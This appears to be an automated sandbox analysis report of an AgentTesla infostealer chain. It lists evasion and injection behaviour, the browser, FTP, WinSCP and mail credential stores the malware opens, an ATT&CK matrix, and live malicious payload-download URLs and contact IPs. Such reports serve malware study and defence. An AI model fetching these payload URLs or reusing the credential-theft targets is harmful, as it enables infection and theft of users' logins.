Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 1240	Thread sleep time: -47935s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3008	Thread sleep time: -20291418481080494s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5900	Thread sleep time: -21213755684765971s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3776	Thread sleep count: 586 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3776	Thread sleep count: 9200 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5900	Thread sleep count: 48 > 30	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Thread sleep count: Count: 9587 delay: -5

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Thread delayed: delay time: 75000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: ota.exe, 0000000C.00000002.420913777.0000000000681000.00000004.00000020.sdmp	Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe"R
Source: RegAsm.exe	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Windows\Installer\MSI7397.tmp	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ota.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Code function: 4_2_00871EEC rdtsc

4_2_00871EEC

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Code function: 4_2_00872CC4 LdrInitializeThunk,

4_2_00872CC4

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Code function: 4_2_00874B2C LoadLibraryA,GetProcAddress,

4_2_00874B2C

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 4_2_008729D9 mov eax, dword ptr fs:[00000030h]	4_2_008729D9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 4_2_00874658 mov eax, dword ptr fs:[00000030h]	4_2_00874658
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 4_2_00874668 mov eax, dword ptr fs:[00000030h]	4_2_00874668
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 4_2_00874707 mov eax, dword ptr fs:[00000030h]	4_2_00874707
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 4_2_00874F70 mov eax, dword ptr fs:[00000030h]	4_2_00874F70
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 4_2_00874F79 mov eax, dword ptr fs:[00000030h]	4_2_00874F79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_009450B5 mov eax, dword ptr fs:[00000030h]	14_2_009450B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_009448DC mov eax, dword ptr fs:[00000030h]	14_2_009448DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_00945BCB mov eax, dword ptr fs:[00000030h]	14_2_00945BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_00945B66 mov eax, dword ptr fs:[00000030h]	14_2_00945B66
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_00F048DC mov eax, dword ptr fs:[00000030h]	22_2_00F048DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_00F050B5 mov eax, dword ptr fs:[00000030h]	22_2_00F050B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_00F05BCB mov eax, dword ptr fs:[00000030h]	22_2_00F05BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_00F05B66 mov eax, dword ptr fs:[00000030h]	22_2_00F05B66
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 26_2_00B050B5 mov eax, dword ptr fs:[00000030h]	26_2_00B050B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 26_2_00B048E7 mov eax, dword ptr fs:[00000030h]	26_2_00B048E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 26_2_00B048DC mov eax, dword ptr fs:[00000030h]	26_2_00B048DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 26_2_00B01DA6 mov eax, dword ptr fs:[00000030h]	26_2_00B01DA6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 26_2_00B01DC0 mov eax, dword ptr fs:[00000030h]	26_2_00B01DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 26_2_00B02BB2 mov eax, dword ptr fs:[00000030h]	26_2_00B02BB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 26_2_00B05BCB mov eax, dword ptr fs:[00000030h]	26_2_00B05BCB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Code function: 4_2_00871F4B LdrInitializeThunk,RtlAddVectoredExceptionHandler,LdrInitializeThunk,LdrInitializeThunk,NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory,

4_2_00871F4B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Show sources

Source: C:\Users\user\AppData\Local\Temp\ota.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 940000	Jump to behavior
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: F00000	Jump to behavior
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B00000	Jump to behavior

Source: C:\Windows\Installer\MSI7397.tmp	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Windows\Installer\MSI7397.tmp	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process created: C:\Users\user\AppData\Local\Temp\ota.exe 'C:\Users\user\AppData\Local\Temp\ota.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ota.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\AppData\Local\Temp\ota.exe'	Jump to behavior
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Afkodedes8\asparagussens.exe'	Jump to behavior
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Afkodedes8\asparagussens.exe'	Jump to behavior
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Afkodedes8\asparagussens.exe'	Jump to behavior

Source: ieinstal.exe, 00000004.00000002.1038981768.00000000032A0000.00000002.00000001.sdmp, RegAsm.exe, 00000016.00000002.1039885229.0000000001770000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: ieinstal.exe, 00000004.00000002.1038981768.00000000032A0000.00000002.00000001.sdmp, RegAsm.exe, 00000016.00000002.1039885229.0000000001770000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: ieinstal.exe, 00000004.00000002.1038981768.00000000032A0000.00000002.00000001.sdmp, RegAsm.exe, 00000016.00000002.1039885229.0000000001770000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: ieinstal.exe, 00000004.00000002.1038981768.00000000032A0000.00000002.00000001.sdmp, RegAsm.exe, 00000016.00000002.1039885229.0000000001770000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Code function: 4_2_00874CD2 cpuid

4_2_00874CD2

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 0000000E.00000002.577037187.000000001D5C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.1046908354.000000001DA01000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4800, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1048, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Source: Yara match	File source: 0000000E.00000002.577037187.000000001D5C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.1046908354.000000001DA01000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4800, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1048, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 0000000E.00000002.577037187.000000001D5C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.1046908354.000000001DA01000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4800, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1048, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Replication Through Removable Media1	Windows Management Instrumentation211	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools1	OS Credential Dumping2	Peripheral Device Discovery11	Replication Through Removable Media1	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Registry Run Keys / Startup Folder11	Process Injection112	Obfuscated Files or Information1	Input Capture1	File and Directory Discovery1	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Registry Run Keys / Startup Folder11	DLL Side-Loading1	Credentials in Registry1	System Information Discovery325	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Masquerading1	NTDS	Query Registry1	Distributed Component Object Model	Input Capture1	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Virtualization/Sandbox Evasion361	LSA Secrets	Security Software Discovery641	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Process Injection112	Cached Domain Credentials	Process Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	Virtualization/Sandbox Evasion361	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	Application Window Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://mail.fibertech.ae	0%	Avira URL Cloud	safe
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
https://mariotessarollo.com/or/ag.binhttps://www.sogecoenergy.com/or/ag.bin	100%	Avira URL Cloud	malware
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
https://www.sogecoenergy.com/ota.bin	0%	Avira URL Cloud	safe
https://mariotessarollo.com/ot/ot.binen	100%	Avira URL Cloud	malware
https://mariotessarollo.com/=	100%	Avira URL Cloud	malware
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.sogecoenergy.com/ot/ot.bin	0%	Avira URL Cloud	safe
http://r3.o.l	0%	Avira URL Cloud	safe
https://mariotessarollo.com/ot/ot.bini	100%	Avira URL Cloud	malware
https://mariotessarollo.com/ot/ot.bin	100%	Avira URL Cloud	malware
https://mariotessarollo.com/ot/ot.binhttps://www.sogecoenergy.com/ot/ot.bin	100%	Avira URL Cloud	malware
https://api.ipify.org%$	0%	Avira URL Cloud	safe
http://r3.i.lencr.org/0	0%	URL Reputation	safe
http://r3.i.lencr.org/0	0%	URL Reputation	safe
http://r3.i.lencr.org/0	0%	URL Reputation	safe
https://mariotessarollo.com/ot/ot.binU	100%	Avira URL Cloud	malware
https://u28IS26ZRk5fJwhXK.org	0%	Avira URL Cloud	safe
https://mariotessarollo.com/	100%	Avira URL Cloud	malware
https://mariotessarollo.com/ows	100%	Avira URL Cloud	malware
https://mariotessarollo.com/ot/ot.binb	100%	Avira URL Cloud	malware
http://r3.i.lencr.org/05	0%	Avira URL Cloud	safe
http://r3.o.lencr.org0	0%	URL Reputation	safe
http://r3.o.lencr.org0	0%	URL Reputation	safe
http://r3.o.lencr.org0	0%	URL Reputation	safe
https://www.sogecoenergy.com/or/ag.bin	100%	Avira URL Cloud	malware
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
https://mariotessarollo.com/or/ag.bin	100%	Avira URL Cloud	malware
http://aMDPVn.com	0%	Avira URL Cloud	safe
http://fibertech.ae	0%	Avira URL Cloud	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
http://www.yandex.comsocks=http=	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
sogecoenergy.com	116.203.34.79	true	false	unknown
fibertech.ae	192.185.29.233	true	true	unknown
mariotessarollo.com	185.81.0.109	true	false	unknown
www.sogecoenergy.com	unknown	unknown	false	unknown
mail.fibertech.ae	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://u28IS26ZRk5fJwhXK.org	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://mail.fibertech.ae	RegAsm.exe, 00000016.00000002.1047356210.000000001DD6D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://127.0.0.1:HTTP/1.1	RegAsm.exe, 0000000E.00000002.577037187.000000001D5C1000.00000004.00000001.sdmp, RegAsm.exe, 00000016.00000002.1046908354.000000001DA01000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://mariotessarollo.com/or/ag.binhttps://www.sogecoenergy.com/or/ag.bin	RegAsm.exe, 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, RegAsm.exe, 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://DynDns.comDynDNS	RegAsm.exe, 00000016.00000002.1046908354.000000001DA01000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.sogecoenergy.com/ota.bin	ieinstal.exe	false	Avira URL Cloud: safe	unknown
https://mariotessarollo.com/ot/ot.binen	ieinstal.exe, 00000004.00000003.526336094.0000000000B42000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://mariotessarollo.com/=	ieinstal.exe, 00000004.00000002.1036948717.0000000000B4D000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://cps.letsencrypt.org0	ieinstal.exe, 00000004.00000003.526285379.0000000000B8E000.00000004.00000001.sdmp, RegAsm.exe, 00000016.00000002.1048916980.0000000021250000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	RegAsm.exe, 0000000E.00000002.577037187.000000001D5C1000.00000004.00000001.sdmp, RegAsm.exe, 00000016.00000002.1046908354.000000001DA01000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.sogecoenergy.com/ot/ot.bin	ieinstal.exe	false	Avira URL Cloud: safe	unknown
http://r3.o.l	ieinstal.exe, 00000004.00000003.526285379.0000000000B8E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://mariotessarollo.com/ot/ot.bini	ieinstal.exe, 00000004.00000002.1036948717.0000000000B4D000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://mariotessarollo.com/ot/ot.bin	ieinstal.exe	true	Avira URL Cloud: malware	unknown
https://mariotessarollo.com/ot/ot.binhttps://www.sogecoenergy.com/ot/ot.bin	ieinstal.exe, 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://api.ipify.org%$	RegAsm.exe, 00000016.00000002.1046908354.000000001DA01000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://r3.i.lencr.org/0	RegAsm.exe, 00000016.00000002.1048916980.0000000021250000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://mariotessarollo.com/ot/ot.binU	ieinstal.exe, 00000004.00000002.1036948717.0000000000B4D000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://mariotessarollo.com/	ieinstal.exe, 00000004.00000002.1036948717.0000000000B4D000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://mariotessarollo.com/ows	ieinstal.exe, 00000004.00000002.1036948717.0000000000B4D000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://mariotessarollo.com/ot/ot.binb	ieinstal.exe, 00000004.00000002.1036948717.0000000000B4D000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
